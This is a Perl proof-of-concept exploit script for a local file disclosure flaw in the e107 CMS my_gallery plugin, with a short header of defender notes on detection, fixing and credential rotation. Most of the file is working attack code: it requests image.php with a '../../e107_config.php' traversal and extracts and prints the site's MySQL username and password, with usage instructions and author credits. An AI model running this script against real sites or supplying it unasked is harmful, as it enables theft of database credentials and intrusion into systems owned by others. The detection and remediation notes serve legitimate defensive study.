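#!/usr/bin/perl
#-----------------------------------------------------#
# usage :                                             #
# root@noge:~# perl e107.pl www.localhost.com         #
#-----------------------------------------------------#
#
# Proof of Concept (PoC) - BEGIN !!!
#
# What the script shows
#   It sends one GET request to the my_gallery plugin's image.php with
#   file=../../e107_config.php and then looks for the mySQLuser and
#   mySQLpassword assignments in the response.  If they are present, the
#   `file` parameter was served without being confined to the gallery
#   directory, i.e. a path-traversal / local file disclosure.
#   (image.php itself is not part of this listing; presumably it passes
#   `file` straight to a file read -- confirm against the plugin source.)
#
# Defender notes
#   Detection : web-server access-log entries for
#               /e107_plugins/my_gallery/image.php whose `file` value
#               contains "../" (including URL-encoded variants).
#   Fix       : resolve the requested name against the gallery directory
#               and reject anything that resolves outside it, or accept
#               only a bare file name from a known list of images.
#   Response  : if such a request was answered with the config contents,
#               treat the database credentials as disclosed and rotate them.

use strict;
use warnings;

use HTTP::Request;
use LWP::UserAgent;

# Host (optionally prefixed with http://) given on the command line.
my $web = $ARGV[0];

# Plugin endpoint and the parameter that takes the file name.
my $vuln = "/e107_plugins/my_gallery/image.php?file=";

# Print the one-line usage hint.
sub help {
    print "\n [LFI] Use : perl $0 \n";
    return;
}

print "\n 4e107 Plugin my_gallery LFD Exploit\n";
print " 12Found by NoGe - Coded by Vrs-hCk\n";

# Exactly one argument is expected; anything else prints the hint and stops.
if (@ARGV != 1) {
    help();
    exit(1);
}

# Build the base URL: keep the argument as given when it already carries
# an http:// scheme, otherwise prepend one.  A trailing slash is always added.
my $target;
if ($web =~ /http:\/\// ) {
    $target = $web."/";
}
else {
    $target = "http://".$web."/";
}

# Two parent-directory steps from the plugin directory reach the site's
# e107_config.php, the file whose contents the check below looks for.
my $exploitx = $target.$vuln."../../e107_config.php";

print "\n [~] Exploiting $target ...\n\n";

my $request   = HTTP::Request->new(GET=>$exploitx);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);    # give up after 10 seconds
my $response  = $useragent->request($request);

if ($response->is_success) {
    # as_string covers the status line, headers and body of the response.
    my $res = $response->as_string;

    # Both matches use /g in scalar context, so the second search resumes
    # from where the first one stopped rather than from the start of $res.
    if ($res =~ m/mySQLuser = '(.*)'/g) {
        print "\n [~] DB Username: $1\n";
    }
    if ($res =~ m/mySQLpassword = '(.*)'/g) {
        print " [~] DB Password: $1\n\n";
    }

    # No mySQLuser assignment in a successful response: the config file
    # was not returned.
    if ($res !~ /mySQLuser/) {
        print " [!] Failed !!!\n\n";
    }
}
else {
    print " [!] Error, ".$response->status_line.".\n\n";
}

# (C) Coded by Vrs-hCk
# Proof of Concept (PoC) - END !!!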